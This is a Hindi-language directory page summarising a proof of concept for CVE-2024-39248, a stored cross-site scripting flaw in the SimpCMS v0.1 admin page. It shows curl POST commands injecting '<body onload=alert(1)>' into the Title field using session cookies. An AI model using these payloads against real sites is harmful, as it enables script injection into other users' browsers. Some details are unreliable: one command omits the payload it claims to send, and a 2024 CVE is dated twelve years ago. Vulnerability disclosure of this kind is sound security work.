Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-39248 — SimpCMS v0.1 में Cross Site Scripting (XSS) के लिए प्रकाशन - /SimpCMS/admin.php | Kitploit
उपकरण/GitHubGitHub/jasonthename/cve-2024-39248
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubjasonthename/cve-2024-39248

CVE-2024-39248

SimpCMS v0.1 में Cross Site Scripting (XSS) के लिए प्रकाशन - /SimpCMS/admin.php

रिपॉजिटरी देखें
12 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Exploit Title: SimpCMS v0.1 - क्रॉस-साइट स्क्रिप्टिंग (XSS)

CVE: CVE-2024-39248

एक्सप्लॉइट लेखक: Jason Jacobs (0xjason_jacobs - Twitter)

विक्रेता होमपेज: https://sourceforge.net/projects/simpcms/

असुरक्षित एंडपॉइंट: /SimpCMS/admin.php

SimpCMS v0.1 में एक क्रॉस-साइट स्क्रिप्टिंग (XSS) कमजोरी हमलावरों को /admin.php पर Title फ़ील्ड में इंजेक्ट किए गए एक क्राफ्टेड पेलोड के माध्यम से मनमाना वेब स्क्रिप्ट या HTML निष्पादित करने की अनुमति देती है।

SourceForge पर लाइव SimpCMS संस्करण के लिए अद्यतन cURL कमांड पैरामीटर:

SimpCMS के एडमिन इंटरफ़ेस में लॉग इन करने के बाद, ब्राउज़र के Inspect एलिमेंट में Application टैब में देखे गए अपने संबंधित Cookie मानों को कॉपी करें और निम्नलिखित curl अनुरोध सबमिट करें:

curl -X POST "http://site.com/SimpCMS/admin/index.php" -d "title=&abbrev=random&newSector=" -b "PHPSESSID=c4v4tjh5fpv4po3k5dp5mrb8r0"

command

poc

प्रारंभिक CVE सबमिशन से पैरामीटर (वही एक्सप्लॉइट काम करता है):

SimpCMS सॉफ़्टवेयर के लिए देखे गए प्रारंभिक पैरामीटर निम्नलिखित cURL कमांड में परिणत हुए लेकिन बाद में अपडेट किए गए:

curl -X POST "http://site.com/SimpCMS/admin.php" -d "title=%3Cbody+onload%3Dalert%281%29%3E&text=ee&cat=something&main=1&submit=submit" -b "username=admin; password=PARAMVALUE"

स्पष्टीकरण:

  • curl: URL के साथ डेटा स्थानांतरित करने के लिए कमांड-लाइन टूल।
  • -X POST: उपयोग करने के लिए अनुरोध विधि निर्दिष्ट करता है (POST)।
  • "http://site.com/SimpCMS/admin.php": वह URL जिस पर अनुरोध भेजा जाता है।
  • -d "title=&abbrev=random&newSector=" -b "PHPSESSID=c4v4tjh5fpv4po3k5dp5mrb8r0" - POST अनुरोध पेलोड।

XSS पेलोड के साथ POST अनुरोध भेजने के लिए इस कमांड को अपने टर्मिनल में चलाएँ। /SimpCMS मुख्य साइट पर जाएँ और XSS दिखाई देगा।

CWE: https://cwe.mitre.org/data/definitions/79.html

टूल डाउनलोड करें